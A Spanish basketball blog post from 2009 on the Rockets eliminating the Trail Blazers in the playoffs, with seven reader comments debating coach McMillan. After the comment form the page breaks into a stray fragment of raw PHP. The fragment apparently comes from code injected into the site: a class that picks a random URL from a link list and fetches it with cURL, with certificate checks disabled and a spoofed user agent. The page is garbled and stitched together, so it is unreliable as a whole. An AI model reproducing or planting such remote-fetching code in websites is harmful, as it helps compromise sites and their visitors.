Blazers 2 – Rockets 4: Fin de la maldición

01 de May de 2009 por TheDeerHunter

Han tenido que esperar a no contar con “el gafe” de T-Mac para poder pasar de primera ronda. Bueno, en realidad no estamos del todo seguros que McGrady haya tenido que ver en este éxito pero objetivamente los Rockets han logrado una estabilidad desde que se lesionó que no han tenido desde hace muchísimo tiempo.

El que sí ha tenido que ver y mucho es Adelman, que el año pasado ya dirigió una meritoria campaña marcada por el alto número de lesiones en un equipo para él nuevo. Este año, sin disponer de su teórico mejor jugador desde un principio, ha logrado cumplir los objetivos implantando un estilo de juego propio, aunque que nadie busque el “passing game” de aquellos Kings geniales.

Ese estilo, aunque parezca mentira, lo marca Artest, al que Adelman conoce más que nadie. Podrá gustarnos bien poco, pero sabemos que si no se le cruzan los cables, lo va a dejar todo en la cancha. Garra, defensa y agresividad son mejores señas de identidad que la inconsistencia que les ha definido durante largos años. A este estilo le pegan como anillo al dedo los Scola, Battier, Landry, Wafer o el defenestrado Mutombo con Yao defendiendo apenas sin querer. Un plácido jardín de florecillas, vamos… sufrir, sufrir y más sufrir. Es lo que toca.

Y en esto McMillan se presenta ante ellos con un equipo poco o nada experimentado pretendiendo jugar a cara de perro, pero con Aldridge, Roy, Blake, Przybilla y Batum. Muuuuy bien, Nate, pero que muuuuy bien. La defensa ha funcionado más o menos como se esperaba. Al fin y al cabo, como hemos dicho, estos Rockets no son aquellos Kings… pero en ataque, más de 10 puntos de media de descenso con respecto a la temporada regular… El sistema ofensivo se ha estrellado de narices contra un muro, como por otro lado la mayoría de nosotros ya nos imaginábamos que podía pasar.

El juego de los Blazers ha sido todo el año más plano que una tabla… ni una sola concesión a la espontaniedad, ni una sóla alternativa existente. Si el objetivo era formar un buen sistema defensivo y alcanzar playoffs es innegable que lo han cumplido, pero eso es todo y dadas las circunstancias resulta insuficiente. Esta plantilla tiene bastante más talento del demostrado, diría que incluso más que Houston… pero  McMillan lo hubiera dado todo por tener en su lugar burdo músculo. Mucho tienes que defender para ganar una eliminatoria anotando poco más de 85 puntos por partido… y estos Blazers no están paridos para eso. La guinda la ha puesto decisiones inexplicables en los momentos decisivos y con todo aún han mantenido opciones puntuales, jugando contra natura.

Es evidente que Adelman ha utilizado los recursos disponibles de forma más eficaz que McMillan. Por un lado Scola, Yao, Artest o Brooks se han turnado para liderar ofensivamente al equipo y prácticamente todo el personal ha llegado a contribuir en algún momento. Enfrente sólo Roy hace y deshace, y las migajas para Aldridge. Punto pelota.  ¿Cómo se pretende que Outlaw, Blake… o la primera titularidad de Rudy en meses te resuelvan la papeleta? ¿pero qué broma pesada es ésta? Sensación de incapacidad… y no precísamente de los jugadores. Y él todavía quejándose de la defensa. Menudo desatino.

McMillan aspira a ser la versión corregida de Larry Brown y se dedicará a rodear al Dios Roy de jugadores talentosos por mediocridades defensivas cargadas de músculo. Y el resto de los equipos estarán encantados con que dé salida a alguna de las perlas que ahora desprecia. Incluso no será difícil que construyan un equipo competitivo a partir de ese modelo. No sería la primera vez. Nate tendrá carta blanca mientras vaya cumpliendo, que es lo único que sabe hacer. No tengo tan claro si será por ahí por donde alcancen ningún Olimpo. La grandeza está reñida con la falta de ambición y la cobardía, defectos que ha mostrado Portland en algún momento estos días. Un equipo pequeño. Eso es lo que han sido.

Si uno fuera McMillan trataría de bajar a Roy a la tierra y convertirlo en un verdadero líder, buscaría a un director de juego y potenciaría el poker Oden-Aldridge-Rudy-Roy como si me fuera la vida en ello, beneficiándome del inmenso talento colectivo por encima de todo. Blake, Batum, Przybilla y Bayless me siguen pareciendo válidos para ese proyecto que está llamado a ser dinastía, en la medida que todos participen del éxito sin ser gregarios de nadie. Nadie puede asegurar que así logre el anillo, pero igual logra atraer a algún chaval por los TrailBlazers. Que le pregunte a Adelman.

Comenta

7 comentarios a esta entrada

  1. kantonyo dice:
    #1

    Posiblemente tengas razon en todo, en el ataque plano, en la falta de valentía, en no saber aprovechar figuras como Outlaw, Oden o Rudy, en dar más poder del necesario a Brandon Roy. Sí, posiblemente tengas razón, y posiblemente este sea el analisis más apropiado.

    Pero creo que hay una corriente con “tufillo” anti-McMillan en España que no veo en los foros de los aficionados americanos de los Blazers. 5 años hacia que los Blazers no llegaban a Play-offs y 8 años que no pasan de primera ronda, en cambio este años han conseguido 54 victorias.

    He visto el 90% de los partidos de Portland este año, y tenía claro que en este momento no habia plantilla para derrotar a Houston. Hubiera sido una proeza conseguirlo. Y ha habido dos encuentros que se han decidido por muy poco, por lo que yo, como fan de Portland, estoy orgulloso de la temporada.

    Aunque como bien dices se necesita más caracter ganador para poder disputar en los próximos años el campeonato, pero con eso contabamos ya, es una plantilla jovencisima. Hay que ver como será el segundo año de Rudy, veremos si se convierte en un Ginobili, confiemos en que Roy y Aldridge sigan mejorando, y habrá que seguir pensando en que Oden se convierta en lo que promete. Si ademas de eso consiguen un base experimentado, esta plantilla puede dominar el oeste en los próximos años.

      Citar

  2. TheDeerHunter dice:
    #2

    No conozco el tufillo que hay sobre McMillan en los foros americanos ni en el de los aficionados de los Blazers. o soy una cosa ni la otra. Pero creo que si no lo hay alguien debería recomendarles que los empezase a haber (y si no ya me lo dirás… que vosotros lo vais a sufrir más que nadie)

    No entiendo porqué dices que no había plantilla para derrotar a Houston. ¿acaso Artest es indiscutiblemente mejor que Roy?? ¿o Scola mejor que Aldridge?? ¿Battier mejor que Rudy o Outlaw??
    Sí te reconozco una cosa, que los Rockets están a años luz de los Blazers en perrería y en dureza… precísamente el planteamiento que ha desplegado McMillan… y que seguirá desplegando, para disfrute de todos vosotros.

    Yo no soy de los que hacen una evaluación en función del futuro, del potencial de lo hipotético… si lees mis comentarios del año pasado ya advertía de no lanzar las campanas al vuelo con este equipo en base a lo que pueda pasar. Hablo de lo que ha pasado. En mi opinión una oportunidad perdida que, además, puede convertirse en un defecto crónico. (ya hablaremos ya… que esto no ha hecho más que empezar)

      Citar

  3. Viva_Dirk dice:
    #3

    Aquí estoy con Deer, el aprovechamiento que ha hecho McMillan de sus piezas ha sido mínimo durante toda la temporada, y eso te convierte en un equipo muy ‘defendible’ en play-offs donde tienes que ganar 4 partidos al mismo equipo y los ajustes se hacen hasta en lo mas ínfimo.

    No puede ser que Roy y Lamarcus a parte, jamás ningun otro halla llevado el pese anotador ni halla sido mas importante durante ningun tramo de la temporada. Por comparar dos situaciones, Brooks y Blake(jugadores 100% distintos ya lo se) han anotado los mismos puntos durante la regular, pero Brooks durante el mes de marzo fue practicamente el valuarte ofensivo de Houston.

    Si durante todo un año limitas tantísimo a los jugadores como hace McMillan te conviertes en un equipo previsible.

      Citar

  4. aro_pasado_no_newtoniano dice:
    #4

    McMillan dimissió¡¡¡¡¡¡¡

      Citar

  5. Fran Reyes dice:
    #5

    Portland necesita, efectivamente, un base con buen tiro y capaz de colocar buenas asistencias. En ese aspecto, Blake puede ser un suplente, mientras Bayless y Sergio no deben ni contar, si acaso como tercera opción y alternativa. Bayless puede ser aprovechado como suplente de Roy; Sergio debe salir a otro equipo donde ser segundo base creativo o a Europa.

    Otra cosa. McMillan debe adaptar las piezas a un engranaje ofensivo, esto es potenciar la interacción entre los jugadores con el fin de tener ataques más variados. O eso, o limitarse como se dice en el artículo a articular un cuarteto defensivo con buen tiro donde el resto de factores los aporte Roy.

      Citar

  6. Txusma dice:
    #6

    Lo queramos o no Sergio no acaba de pegar en este equipo. Este verano sera importante para el. Veremos q decisiones toma.

      Citar

  7. aro_pasado_no_newtoniano dice:
    #7

    Se irá de vacaciones?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>